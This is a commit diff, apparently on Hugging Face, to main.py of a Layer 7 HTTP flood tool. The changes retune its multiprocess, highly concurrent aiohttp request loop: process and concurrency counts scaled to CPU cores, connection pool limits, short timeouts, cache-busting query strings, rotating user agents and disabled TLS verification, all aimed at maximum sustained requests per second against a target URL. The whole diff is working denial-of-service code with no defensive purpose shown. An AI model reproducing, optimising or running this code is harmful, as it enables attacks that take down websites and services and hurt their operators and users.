Samuraiog commited on
Commit
cc29d57
·
verified ·
1 Parent(s): 813edd5

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +28 -26
main.py CHANGED
@@ -36,14 +36,14 @@ CPU_COUNT = psutil.cpu_count(logical=True) or 8
36
  TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
37
 
38
  # OPTIMIZED configuration for maximum sustained RPS
39
- # Balance: enough workers to saturate bandwidth, not so many they block each other
40
  if CPU_COUNT >= 32:
41
- # High-core systems (32-64+ cores)
42
- MAX_PROCESSES = CPU_COUNT * 2 # 128 processes for 64 cores
43
- MAX_CONCURRENCY_PER_PROCESS = 256 # Higher concurrency
44
  elif CPU_COUNT >= 16:
45
- MAX_PROCESSES = CPU_COUNT * 3
46
- MAX_CONCURRENCY_PER_PROCESS = 384
47
  elif CPU_COUNT >= 8:
48
  MAX_PROCESSES = CPU_COUNT * 6 # 48 processes for 8 cores
49
  MAX_CONCURRENCY_PER_PROCESS = 768
@@ -51,7 +51,7 @@ else:
51
  MAX_PROCESSES = CPU_COUNT * 4
52
  MAX_CONCURRENCY_PER_PROCESS = 512
53
 
54
- STATS_BATCH_UPDATE_SIZE = 250 # Larger batches = less lock contention
55
  TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
56
 
57
  # --- L7 Enhanced Headers Pool ---
@@ -251,43 +251,45 @@ async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
251
  ssl_context.check_hostname = False
252
  ssl_context.verify_mode = ssl.CERT_NONE
253
 
254
- # High-performance connector settings
255
  connector = aiohttp.TCPConnector(
256
- limit=0, # Unlimited - let OS handle it
257
- limit_per_host=0,
258
  ttl_dns_cache=300,
259
  force_close=False,
260
  enable_cleanup_closed=False,
261
- keepalive_timeout=120
262
  )
263
 
264
- # Aggressive timeouts
265
- timeout = aiohttp.ClientTimeout(total=2, connect=1, sock_read=1)
266
 
267
  async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
268
  async def task_worker(worker_id):
269
- """Tight request loop."""
270
  local_counter = 0
271
- cache_base = f"?w{worker_id}="
 
 
 
 
 
272
 
273
  while not stop_event.is_set():
274
  try:
275
- # Ultra-minimal request
276
  async with session.get(
277
- f"{url}{cache_base}{local_counter}",
278
- headers={
279
- "User-Agent": random.choice(USER_AGENTS),
280
- "Connection": "keep-alive"
281
- },
282
- allow_redirects=False,
283
- timeout=timeout
284
  ) as resp:
285
- _ = resp.status
286
  local_counter += 1
 
287
  except:
288
- pass
289
 
290
- # Less frequent counter updates for speed
291
  if local_counter >= STATS_BATCH_UPDATE_SIZE:
292
  with shared_counter.get_lock():
293
  shared_counter.value += local_counter
 
36
  TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
37
 
38
  # OPTIMIZED configuration for maximum sustained RPS
39
+ # Sweet spot: 8K-16K workers for high-core systems
40
  if CPU_COUNT >= 32:
41
+ # High-core systems (32-64+ cores) - proven stable at 64 procs × 128 conc
42
+ MAX_PROCESSES = CPU_COUNT # 64 processes for 64 cores
43
+ MAX_CONCURRENCY_PER_PROCESS = 192 # Slightly higher than 128
44
  elif CPU_COUNT >= 16:
45
+ MAX_PROCESSES = CPU_COUNT * 2
46
+ MAX_CONCURRENCY_PER_PROCESS = 256
47
  elif CPU_COUNT >= 8:
48
  MAX_PROCESSES = CPU_COUNT * 6 # 48 processes for 8 cores
49
  MAX_CONCURRENCY_PER_PROCESS = 768
 
51
  MAX_PROCESSES = CPU_COUNT * 4
52
  MAX_CONCURRENCY_PER_PROCESS = 512
53
 
54
+ STATS_BATCH_UPDATE_SIZE = 200 # Optimized batch size
55
  TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
56
 
57
  # --- L7 Enhanced Headers Pool ---
 
251
  ssl_context.check_hostname = False
252
  ssl_context.verify_mode = ssl.CERT_NONE
253
 
254
+ # Balanced connector - controlled connection pool
255
  connector = aiohttp.TCPConnector(
256
+ limit=concurrency * 2, # 2x concurrency for pipeline
257
+ limit_per_host=concurrency * 2,
258
  ttl_dns_cache=300,
259
  force_close=False,
260
  enable_cleanup_closed=False,
261
+ keepalive_timeout=90
262
  )
263
 
264
+ # Fast but not too aggressive timeouts
265
+ timeout = aiohttp.ClientTimeout(total=3, connect=1, sock_read=2)
266
 
267
  async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
268
  async def task_worker(worker_id):
269
+ """Optimized request loop with keep-alive reuse."""
270
  local_counter = 0
271
+ req_counter = 0
272
+ headers = {
273
+ "User-Agent": random.choice(USER_AGENTS),
274
+ "Connection": "keep-alive",
275
+ "Accept": "*/*"
276
+ }
277
 
278
  while not stop_event.is_set():
279
  try:
280
+ # Reuse connections with cache busting
281
  async with session.get(
282
+ f"{url}?_={req_counter}",
283
+ headers=headers,
284
+ allow_redirects=False
 
 
 
 
285
  ) as resp:
286
+ _ = await resp.read() # Fully consume response
287
  local_counter += 1
288
+ req_counter += 1
289
  except:
290
+ req_counter += 1 # Increment even on failure
291
 
292
+ # Batch counter updates
293
  if local_counter >= STATS_BATCH_UPDATE_SIZE:
294
  with shared_counter.get_lock():
295
  shared_counter.value += local_counter